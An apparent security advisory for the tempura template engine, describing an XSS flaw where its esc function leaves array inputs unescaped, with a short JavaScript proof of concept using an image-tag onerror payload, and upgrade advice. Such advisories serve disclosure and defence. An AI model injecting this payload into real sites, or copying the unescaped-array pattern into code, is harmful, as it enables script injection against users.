tempura@0.1.0-next.2 vulnerabilities

A light, crispy, and delicious template engine

Direct Vulnerabilities

Known vulnerabilities in the tempura package. This does not include vulnerabilities belonging to this package’s dependencies.

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.
Fix for free
Vulnerability Vulnerable Version
  • M
Cross-site Scripting (XSS)

tempura is an A light, crispy, and delicious template engine.

Affected versions of this package are vulnerable to Cross-site Scripting (XSS). If the input to the esc function is of type object (i.e an array) it is returned without being escaped/sanitized, leading to a potential Cross-Site Scripting vulnerability.

PoC

const tempura = require("tempura");

let template = `
    {{#expect name}}
    <p> Hello, {{name}} </p>
`

let render = tempura.compile(template)

let r1 = render({name: "<img src=x onerror='alert(1)' />"})
console.log(r1) // <p> Hello, &ltimg src=x onerror='alert(1)' /> </p>

let r2 = render({name: ["<img src=x onerror='alert(1)' />"]})
console.log(r2) // <p> Hello, <img src=x onerror='alert(1)' /> </p>

How to fix Cross-site Scripting (XSS)?

Upgrade tempura to version 0.4.0 or higher.

<0.4.0